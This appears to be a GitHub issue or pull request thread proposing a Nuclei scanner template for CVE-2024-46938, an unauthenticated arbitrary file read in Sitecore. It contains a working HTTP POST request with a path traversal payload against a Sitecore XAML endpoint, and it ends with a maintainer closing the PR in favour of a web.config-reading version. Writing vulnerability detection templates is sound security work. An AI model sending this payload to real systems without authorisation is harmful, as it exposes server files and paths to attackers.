CVE-2024-46938

[vu1nh0lic]

Is there an existing template for this?

• I have searched the existing templates.

Nuclei Template

id: sitecore-file-read-cve-2024-46938

info:
  name: Sitecore Unauthenticated Arbitrary File Read Vulnerability (CVE-2024-46938)
  author: vulnh0lic
  severity: high
  description: |
    This template detects an unauthenticated arbitrary file read vulnerability in Sitecore Experience Platform, Experience Manager, and Experience Commerce from version 8.0 Initial Release through 10.4 Initial Release. An attacker can exploit this vulnerability to read arbitrary files on the server.
  reference:
    - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x

requests:
  - method: POST
    path:
      - "/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a"
    headers:
      Host: "{{Hostname}}"
      Accept-Encoding: "gzip, deflate, br"
      Accept: "*/*"
      Accept-Language: "en-US;q=0.9,en;q=0.8"
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
      Cache-Control: "max-age=0"
      Content-Type: "application/x-www-form-urlencoded"
    body: |
      __PAGESTATE=/../../a/

    matchers:
      - type: word
        words:
          - "Could not find a part of the path"
        part: body
        condition: and
      - type: word
        words:
          - "C:\\inetpub\\wwwroot\\"
        part: body
        condition: and
    extractors:
      - type: regex
        name: file_path
        group: 1
        pattern: "Could not find a part of the path '(C:\\inetpub\\wwwroot\\[^']+)'"

[DhiyaneshGeek]

Hi @vu1nh0lic

this will give more false positive, will return just the path.

i have wrote full template with reading web.config file and raised PR for the same #11236

so we are closing this PR

Thanks